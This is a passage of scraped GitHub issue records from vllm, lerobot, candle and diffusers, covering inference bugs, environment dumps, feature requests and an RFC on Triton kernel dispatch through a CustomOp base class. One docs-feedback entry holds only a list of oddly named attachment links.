[x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31567", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-31T06:00:07Z", "updated_at": "2025-12-31T06:00:07Z", "comments": 0, "user": "npuichigo" }, { "repo": "vllm-project/vllm", "number": 31564, "title": "[Bug]: Qwen3-VL-8B-Instruct has accuracy issue - Multi modal accuracy issue", "body": "### Your current environment\n\n**Current input format:**\n\nmessages = [\n {\"role\": \"system\", \"content\": system_prompt},\n {\n \"role\": \"user\",\n \"content\": [\n {\"type\": \"text\", \"text\": user_prompt},\n {\n \"type\": \"image_url\",\n \"image_url\": {\"url\": image_data_uri}\n }\n ]\n }\n ]\n\n**Command:**\n\npython3 -m vllm serve Qwen/Qwen3-VL-8B-Instruct --max-model-len 22528 --gpu-memory-utilization 0.75 --dtype float16 --port 7001 --trust-remote-code --limit-mm-per-prompt.video 0 --mm-encoder-tp-mode data --mm-processor-cache-gb 0 --tensor-parallel-size 1\n\n**Issue:**\nI have a ID number in a fax form like 12347777568 and the model has extracted like 1234777568. The model has skipped 7, but we have four 7 are there and the model returns three 7 as output.\n\n**How to fix this?**\n1. Can I increase the max pixels like 2048 or something else.\n2. Can I tweak the sampling parameter to allowing the repeated tokens (topp-1 and topk - 0.001) like that.\n\n**Current Sampling:**\n\"top_k\": 20,\n\"top_p\": 0.8,\n\"repetition_penalty\": 1.0,\n\"temperature\": 0.0\n\n### \ud83d\udc1b Describe the bug\n\nHow I need to fix this issue?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31564", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-31T05:13:32Z", "updated_at": "2026-01-02T04:29:14Z", "comments": 3, "user": "Dineshkumar-Anandan-ZS0367" }, { "repo": "huggingface/lerobot", "number": 2737, "title": "SARM WITH PI05: Why trainning loss getting more noise?", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\n\n```\n\n### Description\n\n[SARM with pi05 training for folding towel task _ fold_towel_v3_0 \u2013 Weights & Biases.pdf](https://github.com/user-attachments/files/24389716/SARM.with.pi05.training.for.folding.towel.task._.fold_towel_v3_0.Weights.Biases.pdf)\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2737", "state": "closed", "labels": [ "question", "training" ], "created_at": "2025-12-31T03:20:16Z", "updated_at": "2026-01-02T08:01:25Z", "user": "xianglunkai" }, { "repo": "huggingface/lerobot", "number": 2736, "title": "Questions about VLA multi-task training.", "body": "### Ticket Type\n\n\ud83d\udca1 Feature Request / Improvement\n\n### Environment & System Info\n\n```Shell\n- LeRobot version: 0.4.2\n- Platform: Linux-5.15.0-52-generic-x86_64-with-glibc2.31\n- Python version: 3.10.18\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- FFmpeg version: 6.1.1\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA GeForce RTX 4060 Ti\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n```\n\n### Description\n\nThe generalization capability of VLA mainly comes from pre-training based on large-scale data, but fine-tuning with multi-task co-training also yields good results. This point has been discussed in both the SmolVLA paper and on [Discord](https://discord.com/channels/1216765309076115607/1407325244980727850/1422249462025289809).\n\n\"Image\"\nHowever, the current fine-tuning commands and scripts are based on single-task scenarios. I would like to know how to implement multi-task fine-tuning within the lerobot framework. For example, using it on SmolVLA and pi0.5.\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2736", "state": "open", "labels": [ "enhancement", "question", "examples", "training" ], "created_at": "2025-12-31T03:12:02Z", "updated_at": "2026-01-04T20:02:02Z", "user": "yquanli" }, { "repo": "vllm-project/vllm", "number": 31555, "title": "[Docs] Feedback for `/en/stable/`MONSTERDOG", "body": "### \ud83d\udcda The doc issue\n\n[Projets (1).csv](https://github.com/user-attachments/files/24389184/Projets.1.csv)\n[Projets.csv](https://github.com/user-attachments/files/24389185/Projets.csv)\n[MonsterDog_Pilot_ROI_ISO42001_Report.pdf](https://github.com/user-attachments/files/24389187/MonsterDog_Pilot_ROI_ISO42001_Report.pdf)\n[MonsterDog_Pilot_ROI_ISO42001_Report.pdf](https://github.com/user-attachments/files/24389186/MonsterDog_Pilot_ROI_ISO42001_Report.pdf)\n[LIVRE_BLANC_MONSTERDOG_VINF.md](https://github.com/user-attachments/files/24389188/LIVRE_BLANC_MONSTERDOG_VINF.md)\n[MONSTERDOG_TOTALITY_SUPREME_INFINITY.py](https://github.com/user-attachments/files/24389189/MONSTERDOG_TOTALITY_SUPREME_INFINITY.py)\n[SCRIPT_ULTIME_FINAL_vULT_FULL.md](https://github.com/user-attachments/files/24389190/SCRIPT_ULTIME_FINAL_vULT_FULL.md)\n[RAPPORT_FINAL_MONSTERDOG.md](https://github.com/user-attachments/files/24389191/RAPPORT_FINAL_MONSTERDOG.md)\n\"Image\"\n[safe_hold_v1_1.py](https://github.com/user-attachments/files/24389193/safe_hold_v1_1.py)\n[safe_hold_v1_1.py](https://github.com/user-attachments/files/24389192/safe_hold_v1_1.py)\n[\u2605MONSTERDOG\u2605OMNI\u2605AEGIS\u26052026.py](https://github.com/user-attachments/files/24389194/MONSTERDOG.OMNI.AEGIS.2026.py)\n\n### Suggest a potential alternative/fix\n\n[MonsterDog_Pilot_ROI_ISO42001_Report.pdf](https://github.com/user-attachments/files/24389173/MonsterDog_Pilot_ROI_ISO42001_Report.pdf)\n[MonsterDog_Pilot_ROI_ISO42001_Report.pdf](https://github.com/user-attachments/files/24389172/MonsterDog_Pilot_ROI_ISO42001_Report.pdf)\n[LIVRE_BLANC_MONSTERDOG_VINF.md](https://github.com/user-attachments/files/24389174/LIVRE_BLANC_MONSTERDOG_VINF.md)\n[MONSTERDOG_TOTALITY_SUPREME_INFINITY.py](https://github.com/user-attachments/files/24389175/MONSTERDOG_TOTALITY_SUPREME_INFINITY.py)\n[SCRIPT_ULTIME_FINAL_vULT_FULL.md](https://github.com/user-attachments/files/24389176/SCRIPT_ULTIME_FINAL_vULT_FULL.md)\n[RAPPORT_FINAL_MONSTERDOG.md](https://github.com/user-attachments/files/24389177/RAPPORT_FINAL_MONSTERDOG.md)\n[safe_hold_v1_1.py](https://github.com/user-attachments/files/24389178/safe_hold_v1_1.py)\n[safe_hold_v1_1.py](https://github.com/user-attachments/files/24389179/safe_hold_v1_1.py)\n[\u2605MONSTERDOG\u2605OMNI\u2605AEGIS\u26052026.py](https://github.com/user-attachments/files/24389180/MONSTERDOG.OMNI.AEGIS.2026.py)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31555", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-31T01:20:55Z", "updated_at": "2025-12-31T05:18:48Z", "comments": 0, "user": "s33765387-cpu" }, { "repo": "huggingface/lerobot", "number": 2735, "title": "Buy the camera?", "body": "Hi! Where do I buy the camera and the whole SO-ARM101 kit? \n\nI find the kit at a chinese website like WoWRobo Robotics with only Paypal payment. But is that it? How do I buy the camera otherwise?", "url": "https://github.com/huggingface/lerobot/issues/2735", "state": "open", "labels": [ "question", "sensors" ], "created_at": "2025-12-30T22:32:42Z", "updated_at": "2025-12-30T22:51:39Z", "user": "JFI12" }, { "repo": "huggingface/candle", "number": 3272, "title": "Added support for Vulkan, any interest?", "body": "I have a Intel Arc A770 16GB GPU and wanted to use it with candle. \nI took niklasha's work on niklas-vulkan-2 branch cherry-pick's into the current main branch.\nI (when I say I, I mean I was the navigator, Codex 5.2 max did the work) added the following:\n\nAdded Vulkan queue-family selection and synchronize() so VulkanDevice uses compute-capable queues and can block on GPU work (device.rs).\nExpanded Vulkan storage surface with raw_buffer() access for kernel dispatch and fixed error wiring (storage.rs).\nWired Vulkan kernel registry to include matmul, norms, softmax, masked softmax, and quantized kernels (lib.rs).\nAdded F32/F16 matmul shader stubs and norm/softmax shaders for initial Vulkan ops coverage (*.comp).\nImplemented Vulkan masked softmax and staged SDPA path with GQA support in candle-nn (ops.rs).\nAdded Vulkan smoke tests and masked softmax correctness test (vulkan_smoke_tests.rs, vulkan_masked_softmax.rs).\nFixed missing imports and push-constant binding for Vulkan command execution (storage.rs).\nAdded bytemuck + vulkano-shaders feature wiring for Vulkan builds (Cargo.toml).\nIntroduced QVulkanStorage backed by raw byte buffers with dequantize/quantize helpers (vulkan.rs).\nAdded Vulkan quantized matmul kernels for Q5_0 and Q8_0 (naive, F32 output) (qmatmul_q5_0_f32.comp, qmatmul_q8_0_f32.comp).\nHooked Vulkan quantized path into QTensor forward and added Vulkan quantized tests (mod.rs, vulkan_quantized_tests.rs).\nAdded a dequantize\u2011fallback backward path for QLoRA-style gradients (mod.rs).\nCleaned up dummy Vulkan stubs to match new quantized API surface (dummy_vulkan.rs).\nFixed multiple test harness macro/feature mismatches to compile with Vulkan enabled (test_utils.rs, *.rs).", "url": "https://github.com/huggingface/candle/issues/3272", "state": "open", "labels": [], "created_at": "2025-12-30T02:58:27Z", "updated_at": "2025-12-30T03:00:12Z", "comments": 0, "user": "davidwynter" }, { "repo": "vllm-project/vllm", "number": 31515, "title": "[Feature]: need scheduler solution with high priority to process prefill", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nI have a model situiation which is that the model just care about the throughtput not care about the time delay, so I need a schedule solution which can get the high priority to process prefill and after all prefill is finished in the batch and then process the decode, this solution can increase the decode batch_size at the best. I need this feature to support in vllm ascend~\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31515", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-30T02:09:35Z", "updated_at": "2025-12-30T02:09:35Z", "comments": 0, "user": "184603418" }, { "repo": "vllm-project/vllm", "number": 31486, "title": "[Feature]: GLM 4.7 vocab padding feature", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe number of attention heads in GLM-4.7 is 96, so I\u2019m trying to run the FP8 version with 6\u00d7 H20 GPUs using tensor parallelism (tp=6).\n\nHowever, vllm serve fails and due to `151552 cannot be divided by 6`.\n\nThis seems to be caused by the vocab size 151552 not being divisible by the TP size. In my understanding, this could be solvable by padding the vocab size up. \n\nAlternatively, is there any simpler workaround or recommended solution for this case? Thanks!\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31486", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-29T09:30:35Z", "updated_at": "2026-01-06T02:45:22Z", "comments": 3, "user": "H100-H200-B200" }, { "repo": "vllm-project/vllm", "number": 31484, "title": "[Usage]: RuntimeError when running Qwen2.5-VL-7B-Instruct with vllm: Potential version incompatibility", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 | packaged by Anaconda, Inc. | (main, Oct 21 2025, 20:16:04) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-6.8.0-53-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B200\nGPU 1: NVIDIA B200\nGPU 2: NVIDIA B200\nGPU 3: NVIDIA B200\nGPU 4: NVIDIA B200\nGPU 5: NVIDIA B200\nGPU 6: NVIDIA B200\nGPU 7: NVIDIA B200\n\nNvidia driver version : 570.148.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 144\nOn-line CPU(s) list: 0-143\nVendor ID: GenuineIntel\nBIOS Vendor ID: Intel(R) Corporation\nModel name: Intel(R) Xeon(R) 6960P\nBIOS Model name: Intel(R) Xeon(R) 6960P CPU @ 2.7GHz\nBIOS CPU family: 179\nCPU family: 6\nModel: 173\nThread(s) per core: 1\nCore(s) per socket: 72\nSocket(s): 2\nStepping: 1\nBogoMIPS: 5400.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nL1d cache: 6.8 MiB (144 instances)\nL1i cache: 9 MiB (144 instances)\nL2 cache: 288 MiB (144 instances)\nL3 cache: 864 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-71\nNUMA node1 CPU(s): 72-143\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS Not affected; BHI BHI_DIS_S\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==========", "url": "https://github.com/vllm-project/vllm/issues/31484", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-29T08:36:11Z", "updated_at": "2025-12-30T02:40:38Z", "comments": 1, "user": "puyuan1996" }, { "repo": "huggingface/diffusers", "number": 12899, "title": "Training script of z-image controlnet?", "body": "Can diffusers provide training script of z-image controlnet? ", "url": "https://github.com/huggingface/diffusers/issues/12899", "state": "open", "labels": [], "created_at": "2025-12-29T08:30:09Z", "updated_at": "2025-12-29T08:30:09Z", "comments": 0, "user": "universewill" }, { "repo": "vllm-project/vllm", "number": 31480, "title": "[Usage]: run deepseek v3.2 failed", "body": "### Your current environment\n\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.22.1\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 | packaged by Anaconda, Inc. | (main, Oct 21 2025, 20:16:04) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-78-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 1: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 2: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 3: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 4: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 5: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 6: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 7: NVIDIA RTX PRO 6000 Blackwell Server Edition\n\nNvidia driver version : 580.95.05\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 208\nOn-line CPU(s) list: 0-207\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8470Q\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 52\nSocket(s): 2\nStepping: 8\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.9 MiB (104 instances)\nL1i cache: 3.3 MiB (104 instances)\nL2 cache: 208 MiB (104 instances)\nL3 cache: 210 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-51,104-155\nNUMA node1 CPU(s): 52-103,156-207\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerabili", "url": "https://github.com/vllm-project/vllm/issues/31480", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-29T07:33:04Z", "updated_at": "2025-12-29T07:33:04Z", "comments": 0, "user": "ljwps" }, { "repo": "vllm-project/vllm", "number": 31479, "title": "[Feature]: Enable LoRA support for tower and connector in more MM models", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nRegarding multi-modal models, we have supported adding LoRA to the tower encoder and connector,see: #26674, but have only implemented it for a few models (`Qwen VL series` and `idefics3`). There is no reason not to support other multi-modal models. \n\n### Solution\n\nFor the remaining models we want to support adding LoRA to the tower encoder and connector, we need to implement the following 2 functions:\n\n`get_num_mm_encoder_tokens`\n`get_num_mm_connector_tokens`\n\n**The root cause we need to implement these two functions is:** the number of multi-modal tokens represented in the language model does not necessarily match the input length required by the linear layers in the vision tower or connector. Since the lora_mapping requires the precise input token length prior to activation, these helper functions are necessary to bridge the discrepancy and calculate the correct lengths.\n\n### List of models that are completed or WIP\n\n\n- Qwen VL series: #26674\n- idefics3: #26674\n- LLaVA: https://github.com/vllm-project/vllm/pull/31513\n- BLIP2: https://github.com/vllm-project/vllm/pull/31620\n- GLM4 : https://github.com/vllm-project/vllm/pull/31652\n- PaliGemma https://github.com/vllm-project/vllm/pull/31656\n- H2OVL https://github.com/vllm-project/vllm/pull/31696\n- Pixtral https://github.com/vllm-project/vllm/pull/31724\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31479", "state": "open", "labels": [ "help wanted", "feature request" ], "created_at": "2025-12-29T07:28:52Z", "updated_at": "2026-01-06T02:03:29Z", "comments": 4, "user": "jeejeelee" }, { "repo": "vllm-project/vllm", "number": 31474, "title": "[Feature]: GLM 4.7 vocab padding feature", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe number of attention heads in GLM-4.7 is 96, so I\u2019m trying to run the FP8 version with 6\u00d7 H20 GPUs using tensor parallelism (tp=6).\n\nHowever, vllm serve fails and due to `151552 cannot be divided by 6`.\n\nThis seems to be caused by the vocab size 151552 not being divisible by the TP size. In my understanding, this could be solvable by padding the vocab size up. \n\nAlternatively, is there any simpler workaround or recommended solution for this case? Thanks!\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31474", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-12-29T04:55:28Z", "updated_at": "2025-12-29T09:28:17Z", "comments": 0, "user": "H100-H200-B200" }, { "repo": "vllm-project/vllm", "number": 31469, "title": "[Feature]: Optimize the definition of the fake function in the code.", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe current code contains some fake function definitions, which are placed together with the main logic, such as `all_reduce_fake`. In the `parallel_state.py` file, can we define a file called `parallel_state_fake.py` and move all the corresponding fake functions to this file, and do the same for the others?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31469", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-29T03:14:26Z", "updated_at": "2025-12-29T06:16:08Z", "comments": 3, "user": "lengrongfu" }, { "repo": "vllm-project/vllm", "number": 31467, "title": "[RFC]: A Triton operator dispatch mechanism through modified `CustomOp`", "body": "### Motivation.\n\nTriton is becoming increasingly important in vLLM, and we've noticed its use in many models, quantization processes, and general workflows. Meanwhile, vLLM supports various backends. Typically, to achieve high performance, **different implementations of the Triton kernels** are used on different hardware, such as Ascend NPU. However, we've observed that vLLM currently lacks an effective operator dispatch mechanism for Triton to ensure that various backends can implement their own Triton kernels, which are then uniformly called by vLLM.\n\nThere are 3 ways of calling triton function now:\n\n#### Through Attention Backend\nTriton functions are called in `Attention` layer when the attention backend is specified as `TRITON_ATTN` or `TRITON_MLA`.\n\n```python\ncurrent_platform.get_attn_backend_cls(...)\n```\n\n#### Through CustomOp\nSome triton functions are included in other customops's forward pipeline, and they are put into `forward_cuda`, e.g., `causal_conv1d_fn` and `causal_conv1d_update` in `ShortConv`.\n\n```python\nclass op1(CustomOp):\n def forward_cuda(kwargs):\n triton_fn(**kwargs)\n```\n\n#### Directly call\nAnd there are others directly call triton functions in the normal pipeline.\n - some models derictly call triton functions in forward\n - Qwen3-Next\n - Kimi-Linear\n - ...\n - modelrunner v2\n - block table\n - input batch\n\nAlso, I notice that the implements are different form rocm and nvidia, algouth they are both cuda-alike platform.\n\n```python\nif current_platform.is_rocm():\n\n @triton.jit\n def round_int8(x):\n return tl.extra.hip.libdevice.round(x).to(tl.int8)\n\nelse:\n\n @triton.jit\n def round_int8(x):\n return tl.extra.cuda.libdevice.round(x).to(tl.int8)\n```\n\n\n### Proposed Change.\n\nTo solve the issues above, we propose to do the following changes:\n\n\"Image\"\n\n1. Abstract a `CustomOpBase` class, which maintains funtions `register`, `register_oot` and `forward_dispatch`, which means all the instance of `CustomOpBase` could be registered in/out of vllm.\n2. Seperate `CustomOp` and `CustomTritonOp`, we dispatch `CustomTritonOp` in a python func level, which pairs with the triton kernel. And the `CustomOp` keeps as is.\n3. Refactor the exsiting triton kernels that are directly called without a python funtion warpping it, e.g., `eagle_prepare_inputs_padded_kernel`\n4. Refactor the triton python functions to be hierit from `CustomTritonOp`, and optimize the current implement of triton kernel patching.\n\n#### Example\n\n##### Code Change\n\n```python\nclass CustomOpBase:\n \"\"\"\n Base class for custom op. This class mainly offer the registry and dispatch function,\n and others must be overwrite in the sub classes.\n Dispatches the forward method to the appropriate backend.\n \"\"\"\n\n op_registry: dict[str, Any] = {}\n op_registry_oot: dict[str, Any] = {}\n\n def __new__(cls, *args, **kwargs):\n try:\n op_name = cls.__name__\n except AttributeError:\n raise TypeError(\n f\"Cannot instantiate '{cls.__name__}': its 'name' attribute \"\n f\"was not set, possibly because it was not decorated with \"\n f\"@CustomOp.register, or it's the CustomOp base class itself.\"\n ) from None\n\n if op_name not in cls.op_registry_oot:\n op_cls_to_instantiate = cls\n else:\n op_cls_to_instantiate = cls.op_registry_oot[op_name]\n logger.debug(\n \"Instantiating custom op: %s using %s\",\n op_name,\n str(op_cls_to_instantiate),\n )\n return super().__new__(op_cls_to_instantiate)\n\n def __init__(self, enforce_enable: bool = False):\n self._enforce_enable = enforce_enable\n self._forward_method = self.dispatch_forward()\n\n def forward(self, *args, **kwargs):\n return self._forward_method(*args, **kwargs)\n\n def forward_native(self, *args, **kwargs):\n raise NotImplementedError\n\n def forward_cuda(self, *args, **kwargs):\n raise NotImplementedError\n\n def forward_x(self, *args, **kwargs):\n raise NotImplementedError\n\n def forward_oot(self, *args, **kwargs):\n raise NotImplementedError\n\n def dispatch_forward(self):\n raise NotImplementedError\n\n # Decorator to register custom ops.\n @classmethod\n def register(cls, name: str):\n def decorator(op_cls):\n assert name not in cls.op_registry, f\"Duplicate op name: {name}\"\n op_cls.name = name\n cls.op_registry[name] = op_cls\n return op_cls\n\n return decorator\n\n @classmethod\n def register_oot(cls, _decorated_op_cls=None, name: str | None = None):\n def decorator(op_cls):\n reg_name = name if name is not None else cls.__name__\n assert reg_name not in cls.op_registry_oot, f\"Duplicate op name: {reg_", "url": 